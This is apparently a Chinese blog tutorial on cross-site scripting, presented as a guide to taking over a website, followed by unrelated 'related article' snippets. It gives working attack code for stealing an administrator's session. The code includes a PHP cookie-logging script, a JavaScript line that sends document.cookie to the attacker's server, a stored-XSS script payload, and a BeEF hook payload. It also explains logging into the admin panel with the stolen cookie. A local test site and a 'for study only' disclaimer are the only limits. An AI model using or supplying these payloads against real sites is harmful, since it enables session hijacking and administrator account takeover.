xss跨站攻击详讲 | 如何利用xss拿下一个站?
目录
- 1.初识xxs跨站漏洞
- 2.xss的类型
- 2.1反射型
- 2.2存储型
- 2.3DOM型
- 3.测试环境搭建
- 3.1搭建测试网站
- 3.2获取xss攻击代码
- 4.实战演示
- 5.利用自定义xss获取cookie
- 6.beef工具实现xss
1.初识xxs跨站漏洞
xss能干什么?
利用xss获取对方后台地址、cookie信息,得到cookie和后台地址后,能通过相关工具(比如postman)进行后台登录:
其他补充:
cookie :一般用于小中型网站,一般存储在自己电脑上,存活时间较长
session:采用会话模式,一般用于大型网站,一存储在服务器上,存活时间较短
2.xss的类型
2.1反射型
当在网页插入下列xss代码后,会立即回馈到屏幕,但这条xss代码并不会一直存储到该网站上
<script>alert(1)</script>
提交后返回:
2.2存储型
利用xss跨站漏洞,基本都是建立在存储型上
,其他类型只作了解
例如留言板、评论、订单信息、反馈等,能一直留在后台上
2.3DOM型
采用JavaScript进行处理,保存在前端
这句代码并不包含攻击性,可以用来测试是否有xss漏洞
<script>alert(1)</script>
同时,也可以改成带攻击的代码,进行窃取cookie
3.测试环境搭建
3.1搭建测试网站
首先下载军锋真人cs野战的源码:
http://js.down.chinaz.com/201202/jfdd_v2.0.zip
解压到网站目录,访问网站地址127.0.0.1/jfdd/install.php
进行一步步安装即可(后台密码也在这儿设置)
设置好能够登录网站后台,表示初始化成功
3.2获取xss攻击代码
在xss平台注册账号,并创建好项目:
https://xss8.cc/
创建项目配置代码这块可以根据自己的需求勾选,我这里只勾选了默认
配置好后,点击查看代码
我们这里随便选取一条代码即可
4.实战演示
随便选择一条代码,放到登录界面任意位置,点击提交即可
这时候,只要网站管理员登录到后台查看了这条信息,就可以截取到对方的cookie值。
模拟管理员登录后台,并查看此条信息
在xxs平台即可看到截获的cookie
只要获取到完整的cookie数据,我们就可以利用工具进行连接登录到后台,(完整cookie包括cookie和session,但是一般xss平台是截取不到session的,所以请读者另想办法,思路:获取phpinfo中的cookie)
然后我们使用postman进行连接登录后台即可
5.利用自定义xss获取cookie
1.在web服务器上创建一个write_cookie.php文件
write_cookie.php
代码如下
<?php
$cookie=$_GET['c'];
$str=fopen('cookie.txt','w');
fwrite($str,"$cookie");
fclose($str);
?>
代码解释
$cookie=$_GET['c'];
获取链接中c参数的值
其他代码就打开并写入到cookie.txt文件中
2.在web服务器端创建send_cookie.js
文件
代码如下:
其中src的地址为自己服务器的地址
new Image().src="http://127.0.0.1/write_cookie.php?c=" + encodeURI(document.cookie);
构造payload
<script src=http://127.0.0.1/send_cookie.js></script>
将构造好的payload插入到测试点中
当管理员登录到后台查看此订单时,将会将管理员cookie数据发送到web服务器
查看服务器,收到了cookie数据
6.beef工具实现xss
beef安装教程:
https://blog.csdn.net/weixin_43148062/article/details/105601649
配置好beef之后,写一个payload,src为beef的服务器地址(在beef配置文件中可以看到)
<script src="//127.0.0.1:3000/hook.js"></script>
和之前的步骤一样,将payload写入测试站
登录beef后台,当测试站管理员登录并查看信息后,beef后台将会有主机上线(xx号已上机~欢迎您的使用[doge])
使用beef获取网站cookie
beef的功能很强大,这里仅示范一个获取cookie的操作,其他请读者自行探索!
xss相关补充文章:
== 你知道吗,你用的大马可能早就被别人装后门了!!==
如何检查自己用的大马是否被写了后门?如何利用xss反杀别人写了后门的大马?
欢迎继续阅读下篇文章:“黑吃黑”的webshellbox
本篇文章仅作技术学习研究,切勿拿来行坏事!!任何违法操作都与本文作者无关。
xss跨站攻击详讲 | 如何利用xss拿下一个站?相关推荐
- python从random生成列表_详解Python利用random生成一个列表内的随机数
详解Python利用random生成一个列表内的随机数 首先,需要导入random模块: import random 随机取1-33之间的1个随机数,可能重复: random.choice(range ...
- python随机生成数字列表_详解Python利用random生成一个列表内的随机数
首先,需要导入random模块: import random 随机取1-33之间的1个随机数,可能重复: random.choice(range(1,34)) print得到一系列随机数,执行一次得到 ...
- Cross-Site Scripting XSS 跨站攻击全攻略
原文:http://a1pass.blog.163.com/blog/static/2971373220087295449497/ 题记:这是我在<黑客X档案>08年第5期发表的一篇文章, ...
- XSS跨站脚本攻击详解以及复现gallerycms字符长度限制短域名绕过
一.什么是XSS 1.XSS原理 跨网站脚本(Cross-site scripting,XSS) 又称为跨站脚本攻击,是一种经常出现在Web应用程序的安全漏洞攻击,也是代码注入的一种.XSS是由于We ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(七):跨域攻击分析及防御
目录 前言 一.跨域攻击方法 二.利用域信任关系的跨域攻击 1.域信任简介 2.获取域信息 3.利用域信任秘钥(NTLM Hash)获取目标域的权限 4.利用krbtgt散列值获取目标域的权限 5.利 ...
- Linux缓冲区溢出攻击详解
Linux缓冲区溢出攻击详解 (一)当一个函数被调用后,它会: 移动栈指针ESP,EBP.开辟一段栈空间 在栈(堆)空间内分配程序申请的局部变量 (二)当一个函数去调用另一个函数时,它会: 准备入口参 ...
- 关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)
我们常说的网络安全其实应该包括以下三方面的安全: 1.机密性,比如用户的隐私被窃取,帐号被盗,常见的方式是木马. 2.完整性,比如数据的完整,举个例子,康熙传位十四子,被当时四阿哥篡改遗诏:传位于四子 ...
- 【转载】关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)
我们常说的网络安全其实应该包括以下三方面的安全: 1.机密性,比如用户的隐私被窃取,帐号被盗,常见的方式是木马. 2.完整性,比如数据的完整,举个例子,康熙传位十四子,被当时四阿哥篡改遗诏:传位于四子 ...
- 如何进行渗透测试XSS跨站攻击检测
国庆假期结束,这一节准备XSS跨站攻击渗透测试中的利用点,上一节讲了SQL注入攻击的详细流程,很多朋友想要咨询具体在跨站攻击上是如何实现和利用的,那么我们Sinesafe渗透测试工程师为大家详细的讲讲 ...
- xss跨站攻击html转义,前端攻击和防御(一)XSS跨站脚本攻击
(一)XSS跨站脚本攻击 (1)XSS简介 XSS攻击全称跨站脚本攻击(Cross Site Scripting),是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 ...
最新文章
- html5网页怎么实现内容追加,纯js实现网页内容复制后自动追加自定义内容
- 清北2021毕业生就业报告出炉!清华博士0人出国,70%进体制
- Ubuntu 之 atom 安装以及 常用配置
- 页面间的跳转,打开,关闭小技巧.
- android 模块自动加载,Android 之ko模块的自动加载
- Java基于springMVC的验证码案例
- tensorrt轻松部署高性能dnn推理_实战教程:TensorRT中递归神经网络的介绍(中文字幕)...
- html表格全屏显示,tableView滑动全屏显示
- ac3168无线网卡驱动下载_计算机基础:网卡
- Go编译android,在Android中引用golang编译的aar包
- 如何在基于Aspect的情感分析中结合BERT和语法信息
- Windows系统过滤病毒功能吗
- Vivado 2017封装自定义IP Core
- sakai mysql_sakai 开发环境搭建(一)
- 华为USB线刷工具的使用
- 自媒体赚钱网站有哪些(写文章赚钱的网站大全)
- labwindows制作特殊图形面板
- 卖奥特曼卡片年入十亿:赚钱这事,你还得相信光的力量
- 【光模块专题】最常见的几种光模块光纤接口类型
- 现在企业常用考勤软件
热门文章
- linux sipp 呼叫转移_★★★★盲转接业务的sipp脚本实现
- 知网查重报告html乱码,知网查重报告出现乱码怎么办
- angular 使用jsMind
- PCB设计流程(精简)
- 七大江河水系--辽河
- 操作系统系统笔记整理
- 机械手三维图 matlab,机械手的三维建模
- java超市运行程序源代码_Java课程设计超市库存管理系统附源代码可以直接运行...
- MAML小样本学习算法解读及基于飞桨的代码实现
- 原版XP SP3安装程序集成识别SATA的AHCI驱动的解决方法